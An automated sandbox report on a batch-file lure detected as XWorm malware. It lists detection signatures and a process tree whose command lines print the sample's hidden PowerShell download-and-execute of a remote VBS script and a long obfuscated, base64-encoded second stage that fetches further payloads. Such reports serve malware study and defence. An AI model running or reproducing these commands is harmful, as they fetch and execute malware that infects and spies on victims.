Edit tour

Windows Analysis Report
z1Documents_pdf_.bat

Overview

General Information

Sample name:	z1Documents_pdf_.bat
Analysis ID:	1625560
MD5:	a4f96058a3e0f23d6c65ea8f77aed774
SHA1:	ad63b439f836177f5a5e39568b98a13e6425f062
SHA256:	cb6b3b83c063bab4e7133104e845a8b9b15c8f7ba123d2203167a9101478e02b
Tags:	batuser-Porcupine
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Sigma detected: Copy file to startup via Powershell

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Connects to a pastebin service (likely for C&C)

Contains functionality to log keystrokes (.Net Source)

Creates autostart registry keys with suspicious values (likely registry only malware)

Creates multiple autostart registry keys

Disables UAC (registry)

Encrypted powershell cmdline option found

Found suspicious powershell code related to unpacking or dynamic code loading

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Potential dropper URLs found in powershell memory

Sample has a suspicious name (potential lure to open the executable)

Sample uses string decryption to hide its real strings

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Potential PowerShell Command Line Obfuscation

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: PowerShell DownloadFile

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Tries to download and execute files (via powershell)

Uses dynamic DNS services

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: PowerShell Download Pattern

Sigma detected: PowerShell Script Run in AppData

Sigma detected: PowerShell Web Download

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Suspicious Powershell In Registry Run Keys

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Too many similar processes found

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Process Tree

System is w10x64

cmd.exe (PID: 6764 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\z1Documents_pdf_.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6936 cmdline: powershell.exe -WindowStyle hidden -command "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$YCEnA; $TDILN = (New-Object Net.WebClient);$TDILN.Encoding = [System.Text.Encoding]::UTF8;$YCEnA = $TDILN.DownloadString( 'https://teldrum.ro//images/globalx1.vbs' );$dYOsY = [System.IO.Path]::GetTempPath() + '\x.vbs';$YCEnA | Out-File -FilePath $dYOsY; wscript.exe //nologo $dYOsY" MD5: 04029E121A0CFA5991749937DD22A1D9)

wscript.exe (PID: 2332 cmdline: "C:\Windows\system32\wscript.exe" //nologo C:\Users\user\AppData\Local\Temp\\x.vbs MD5: A47CBE969EA935BDD3AB568BB126BC80)

powershell.exe (PID: 3612 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $hzjmp = 'Ow' + [char]66 + '9ADsAIA' + [char]66 + 'pAFQAQw' + [char]66 + '2AFgAJAAgAGUAbA' + [char]66 + 'pAEYALQAgAHMAcw' + [char]66 + 'hAHAAeQ' + [char]66 + 'CACAAeQ' + [char]66 + 'jAGkAbA' + [char]66 + 'vAFAAbg' + [char]66 + 'vAGkAdA' + [char]66 + '1AGMAZQ' + [char]66 + '4AEUALQAgAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAIA' + [char]66 + 'pAFQAQw' + [char]66 + '2AFgAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAE8AbQ' + [char]66 + 'tAGYAUgAkADsAIAApACAAJwAxAHMAcAAuADMAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAGkAVA' + [char]66 + 'DAHYAWAAkADsAIAAnADsAKQAgACkAIAAnACcAbQ' + [char]66 + 'zAGEAZw' + [char]66 + 'lAHIAXAA5ADEAMwAwADMALgAwAC4ANA' + [char]66 + '2AFwAaw' + [char]66 + 'yAG8Adw' + [char]66 + 'lAG0AYQ' + [char]66 + 'yAGYAXA' + [char]66 + '0AGUAbgAuAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 'tAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAdw' + [char]66 + 'cADoAYw' + [char]66 + 'EAEQAIA' + [char]66 + 'EACcAJwAgACwAIAAnACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACcAIAAsACAAJwAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + '0AGUAbA' + [char]66 + 'kAHIAdQ' + [char]66 + 'tAC4Acg' + [char]66 + 'vAC8ALw' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAcwAvAGcAbA' + [char]66 + 'vAGIAYQ' + [char]66 + 'sAHgAMQAuAGoAcA' + [char]66 + 'nACcAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJwAnAEkAVg' + [char]66 + 'GAHIAcAAnACcAIAAoAGQAbw' + [char]66 + 'oAHQAZQAnACAAPQArACAATw' + [char]66 + 'tAG0AZg' + [char]66 + 'SACQAOwAgACcATQ' + [char]66 + '0AGUARwAuACkAIAAnACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAJwAgACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + '0AGUARwAnACAAPQArACAATw' + [char]66 + 'tAG0AZg' + [char]66 + 'SACQAOwAgACcALgApACAAcg' + [char]66 + 'GAGQAWQ' + [char]66 + 'SACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAJwAgACsAIAAnADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAJwAgAD0AKwAgAE8AbQ' + [char]66 + 'tAGYAUgAkADsAIAAnADsAIAApACAAKQAnACcAQQAnACcALAAnACcAkyE6AJMhJwAnACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAcgAuAEcAZQ' + [char]66 + 'hAHkAcgAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + 'zAGEAQg' + [char]66 + 'tAG8Acg' + [char]66 + 'GADoAOg' + [char]66 + 'dAHQAcg' + [char]66 + 'lAHYAbg' + [char]66 + 'vAEMALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAcw' + [char]66 + 'bACAAPQAgAHIARg' + [char]66 + 'kAFkAUgAkACAAXQ' + [char]66 + 'dAFsAZQ' + [char]66 + '0AHkAQg' + [char]66 + 'bACcAIAA9ACsAIA' + [char]66 + 'PAG0AbQ' + [char]66 + 'mAFIAJAA7ACAAJwA7ACkAOA' + [char]66 + 'GAFQAVQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAtACAAbw' + [char]66 + 'JAFkAZg' + [char]66 + '0ACQAIA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC0AIA' + [char]66 + '0AG4AZQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC0AdA' + [char]66 + 'lAEcAKAAgAD0AIA' + [char]66 + 'HAGUAYQ' + [char]66 + '5AHIAJAAgADsAIAApACAAJwAnAHQAeA' + [char]66 + '0AC4AMgAwAGwAbA' + [char]66 + 'kACcAJwAgACsAIAApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAKAAgAD0AIA' + [char]66 + 'vAEkAWQ' + [char]66 + 'mAHQAJAAnACAAPQAgAE8AbQ' + [char]66 + 'tAGYAUgAkADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgAG4AVg' + [char]66 + 'jAFEAagAkACAAaA' + [char]66 + '0AGEAUA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAC0AIA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAC0AdA' + [char]66 + '1AE8AIA' + [char]66 + '8ACAARg' + [char]66 + 'IAFIATQ' + [char]66 + '0ACQAOwApAE0ATQ' + [char]66 + 'VAGkAegAkACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAdA' + [char]66 + 'lAEcALgA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAEYASA' + [char]66 + 'SAE0AdAAkADsAIAApACAARw' + [char]66 + 'RAHUARg' + [char]66 + 'uACQAIAAoAGEAdA' + [char]66 + 'hAEQAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'EAC4Abg' + [char]66 + 'HAGkAcQ' + [char]66 + 'jACQAIAA9ACAATQ' + [char]66 + 'NAFUAaQ' + [char]66 + '6ACQAOwAgACkAIA' + [char]66 + 'mAHEATg' + [char]66 + 'aAGMAJAAgAGgAdA' + [char]66 + 'hAFAALQAgAHQAbg' + [char]66 + 'lAHQAbg' + [char]66 + 'vAEMALQ' + [char]66 + '0AGUARwAgACgAIAA9ACAAIA' + [char]66 + 'HAFEAdQ' + [char]66 + 'GAG4AJAA7ACAAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + 'uAEcAaQ' + [char]66 + 'xAGMAJAA7ACAAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAgAD0AIA' + [char]66 + 'uAEcAaQ' + [char]66 + 'xAGMAJAA7ACAAKQAgACcAdA' + [char]66 + '4AHQALgAyADAAbA' + [char]66 + 'sAGQAJwAgACsAIAApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAKAAgAD0AIA' + [char]66 + 'uAFYAYw' + [char]66 + 'RAGoAJAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIAAnADgARg' + [char]66 + 'UAFUAJwAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAtACAAZg' + [char]66 + 'xAE4AWg' + [char]66 + 'jACQAIA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAGUAbA' + [char]66 + 'pAEYALQAgAGUAbA' + [char]66 + 'pAEYALQ' + [char]66 + '0AHUATwAgAHwAIA' + [char]66 + 'MAFUAdw' + [char]66 + '' + [char]66 + 'AEYAJAA7AHkATQ' + [char]66 + 'lAHMAYQ' + [char]66 + 'CACAAPQAgAEwAVQ' + [char]66 + '3AEEARgAkACAAOw' + [char]66 + 'MAFUAdw' + [char]66 + '' + [char]66 + 'AEYAJAAgAD0AIA' + [char]66 + 'lAHMAYQ' + [char]66 + 'iAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TACQAOwAgACkAIA' + [char]66 + 'kAHAAaA' + [char]66 + '0AGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'EAC4AdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAHcAJAAgAD0AIA' + [char]66 + 'MAFUAdw' + [char]66 + '' + [char]66 + 'AEYAJAA7ACAAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAgAD0AIA' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAdwAkADsAKQAgACcAdA' + [char]66 + '4AHQALgAxADAAbA' + [char]66 + 'sAGQAJwAgACsAIAApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAKAAgAD0AIA' + [char]66 + 'mAHEATg' + [char]66 + 'aAGMAJAA7ACkAIAAnAC8Adw' + [char]66 + 'hAHIALw' + [char]66 + '0AGsAdg' + [char]66 + 'mAHYAagAvAHQAZQ' + [char]66 + 'uAC4AeQ' + [char]66 + 'yAGUAdA' + [char]66 + 'zAGEAcAAuAHcAdw' + [char]66 + '3AC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACgAIAA9ACAAZA' + [char]66 + 'wAGgAdA' + [char]66 + 'sACQAOw' + [char]66 + '9ADsAcg' + [char]66 + 'GAGQAWQ' + [char]66 + 'SACQAIA' + [char]66 + 'uAHIAdQ' + [char]66 + '0AGUAcgA7ACkAKQ' + [char]66 + 'lAHMAYQ' + [char]66 + 'iAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TACQAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + 'zAGEAQg' + [char]66 + 'tAG8Acg' + [char]66 + 'GADoAOg' + [char]66 + 'dAHQAcg' + [char]66 + 'lAHYAbg' + [char]66 + 'vAEMALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAcw' + [char]66 + 'bACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAdA' + [char]66 + 'lAEcALgA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAHIARg' + [char]66 + 'kAFkAUgAkADsAew' + [char]66 + '5AE0AZQ' + [char]66 + 'zAGEAQgAgAG4Abw' + [char]66 + 'pAHQAYw' + [char]66 + 'uAHUARgA7AGUAcw' + [char]66 + 'hAGIAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAJAA7ACAAMgAxAHMAbA' + [char]66 + 'UADoAOg' + [char]66 + 'dAGUAcA' + [char]66 + '5AFQAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOw' + [char]66 + '9ACAACgANADsAdA' + [char]66 + 'pAHgAZQAgACAAIAAgACAAIAAKAA0AOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAcg' + [char]66 + 'lAHQAdQ' + [char]66 + 'wAG0Abw' + [char]66 + 'DAC0AdA' + [char]66 + 'yAGEAdA' + [char]66 + 'zAGUAUgAKAA0AIA' + [char]66 + '7AGUAcw' + [char]66 + 'sAGUACgANAAoADQ' + [char]66 + '9AAoADQAgACAAIAAgACAAIAAgAAoADQAgAHsAKQ' + [char]66 + 'sAGwAdQ' + [char]66 + 'OACQAIA' + [char]66 + 'xAGUALQAgACkAZQ' + [char]66 + '1AG4AaQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAHkAbA' + [char]66 + '0AG4AZQ' + [char]66 + 'sAGkAUwAgAGEAZQAtACAAJw' + [char]66 + 'lAHoAeQ' + [char]66 + 'sAGEAbg' + [char]66 + 'hACcALAAnAFMATg' + [char]66 + 'EAGUAdA' + [char]66 + 'hAHAAYQAnACwAJw' + [char]66 + 'rAHIAYQ' + [char]66 + 'oAHMAZQ' + [char]66 + 'yAGkAVwAnACAAcw' + [char]66 + 'zAGUAYw' + [char]66 + 'vAHIAcAAtAHQAZQ' + [char]66 + 'nACgAKA' + [char]66 + 'mAGkAOwAgADIAMQ' + [char]66 + 'zAGwAVAA6ADoAXQ' + [char]66 + 'lAHAAeQ' + [char]66 + 'UAGwAbw' + [char]66 + 'jAG8AdA' + [char]66 + 'vAHIAUA' + [char]66 + '5AHQAaQ' + [char]66 + 'yAHUAYw' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwA6ADoAXQ' + [char]66 + 'yAGUAZw' + [char]66 + 'hAG4AYQ' + [char]66 + 'NAHQAbg' + [char]66 + 'pAG8AUA' + [char]66 + 'lAGMAaQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bAHsAIA' + [char]66 + 'lAHMAbA' + [char]66 + 'lAH0AIA' + [char]66 + 'mAC8AIAAwACAAdAAvACAAcgAvACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'uAHcAbw' + [char]66 + 'kAHQAdQ' + [char]66 + 'oAHMAIAA7ACcAMAA4ADEAIA' + [char]66 + 'wAGUAZQ' + [char]66 + 'sAHMAJwAgAGQAbg' + [char]66 + 'hAG0AbQ' + [char]66 + 'vAGMALQAgAGUAeA' + [char]66 + 'lAC4AbA' + [char]66 + 'sAGUAaA' + [char]66 + 'zAHIAZQ' + [char]66 + '3AG8AcAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIAApACAAJw' + [char]66 + 'wAHUAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + 'tAGEAcg' + [char]66 + 'nAG8Acg' + [char]66 + 'QAFwAdQ' + [char]66 + 'uAGUATQAgAHQAcg' + [char]66 + 'hAHQAUw' + [char]66 + 'cAHMAdw' + [char]66 + 'vAGQAbg' + [char]66 + 'pAFcAXA' + [char]66 + '0AGYAbw' + [char]66 + 'zAG8Acg' + [char]66 + 'jAGkATQ' + [char]66 + 'cAGcAbg' + [char]66 + 'pAG0AYQ' + [char]66 + 'vAFIAXA' + [char]66 + 'hAHQAYQ' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AFwAJwAgACsAIA' + [char]66 + 'XAEMAdw' + [char]66 + '' + [char]66 + 'AEcAJAAgACgAIA' + [char]66 + 'uAG8AaQ' + [char]66 + '0AGEAbg' + [char]66 + 'pAHQAcw' + [char]66 + 'lAEQALQAgACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAbQ' + [char]66 + 'lAHQASQAtAHkAcA' + [char]66 + 'vAEMAIAA7ACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'zAGUAcg' + [char]66 + 'vAG4ALwAgAHQAZQ' + [char]66 + 'pAHUAcQAvACAARQ' + [char]66 + 'vAEEAbA' + [char]66 + 'nACQAIA' + [char]66 + 'lAHgAZQAuAGEAcw' + [char]66 + '1AHcAIA' + [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAIAA7ACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAWQ' + [char]66 + 'OAEsAYg' + [char]66 + 'mACQAKAAgAD0AIA' + [char]66 + 'FAG8AQQ' + [char]66 + 'sAGcAJAA7ACkAIA' + [char]66 + 'lAG0AYQ' + [char]66 + 'OAHIAZQ' + [char]66 + 'zAFUAOgA6AF0AdA' + [char]66 + 'uAGUAbQ' + [char]66 + 'uAG8Acg' + [char]66 + 'pAHYAbg' + [char]66 + 'FAFsAIAArACAAJw' + [char]66 + 'cAHMAcg' + [char]66 + 'lAHMAVQ' + [char]66 + 'cADoAQwAnACAAKAAgAD0AIA' + [char]66 + 'XAEMAdw' + [char]66 + '' + [char]66 + 'AEcAJAA7ACkAIAApACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAFkATg' + [char]66 + 'LAGIAZgAkACgAIAAsAGcAeA' + [char]66 + '4AHcAawAkACAAKA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHoAZA' + [char]66 + 'wAG0AZAAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '6AGQAcA' + [char]66 + 'tAGQAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + '6AGQAcA' + [char]66 + 'tAGQAJAA7AH0AOwAgACkAZw' + [char]66 + '4AHgAdw' + [char]66 + 'rACQAKAAgAD0AIA' + [char]66 + 'nAHgAeA' + [char]66 + '3AGsAJA' + [char]66 + '7ACAAZQ' + [char]66 + 'zAGwAZQ' + [char]66 + '9ADsAIA' + [char]66 + 'zAG8Abg' + [char]66 + 'lAG0AJAAgAD0AIA' + [char]66 + 'nAHgAeA' + [char]66 + '3AGsAJA' + [char]66 + '7ACAAKQAgAHcAVg' + [char]66 + 'nAGgARQAkACAAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcw' + [char]66 + 'uAGkAYQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC4ARQ' + [char]66 + 'SAFUAVA' + [char]66 + 'DAEUAVA' + [char]66 + 'JAEgAQw' + [char]66 + 'SAEEAXw' + [char]66 + 'SAE8AUw' + [char]66 + 'TAEUAQw' + [char]66 + 'PAFIAUAA6AHYAbg' + [char]66 + 'lACQAIAA9ACAAdw' + [char]66 + 'WAGcAaA' + [char]66 + 'FACQAOwAnAHUAcw' + [char]66 + 'tAC4ANQ' + [char]66 + 'jAGoAZA' + [char]66 + 'zADYALw' + [char]66 + 'lAG8AbQAuAHgAbw' + [char]66 + 'iAHQAYQ' + [char]66 + 'jAC4Acw' + [char]66 + 'lAGwAaQ' + [char]66 + 'mAC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACAAPQAgAHMAbw' + [char]66 + 'uAGUAbQAkADsAJw' + [char]66 + '1AHMAbQAuAG8AdQ' + [char]66 + '1AGsAYQ' + [char]66 + 'zAC8AZQ' + [char]66 + 'vAG0ALg' + [char]66 + '4AG8AYg' + [char]66 + '0AGEAYwAuAHMAZQ' + [char]66 + 'sAGkAZgAvAC8AOg' + [char]66 + 'zAHAAdA' + [char]66 + '0AGgAJwAgAD0AIA' + [char]66 + 'nAHgAeA' + [char]66 + '3AGsAJAA7ACkAIAAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + 'ZAE4ASw' + [char]66 + 'iAGYAJAAgACgAIA' + [char]66 + 'sAGUAZAA7ACkAIAApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAKAAgAD0AIA' + [char]66 + 'ZAE4ASw' + [char]66 + 'iAGYAJA' + [char]66 + '7ACAAKQAgAFoAWg' + [char]66 + 'rAFQATAAkACAAKAAgAGYAaQA7ACAAKQAyACgAcw' + [char]66 + 'sAGEAdQ' + [char]66 + 'xAEUALg' + [char]66 + 'yAG8Aag' + [char]66 + 'hAE0ALg' + [char]66 + 'uAG8AaQ' + [char]66 + 'zAHIAZQ' + [char]66 + 'WAC4AdA' + [char]66 + 'zAG8AaAAkACAAPQAgAFoAWg' + [char]66 + 'rAFQATAAkACAAOwA=';$hzjmp = $hzjmp.replace('???' , 'B') ;;$vkfmh = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $hzjmp ) ); $vkfmh = $vkfmh[-1..-$vkfmh.Length] -join '';$vkfmh = $vkfmh.replace('%XRqhI%','C:\Users\user\AppData\Local\Temp\x.vbs');powershell $vkfmh MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

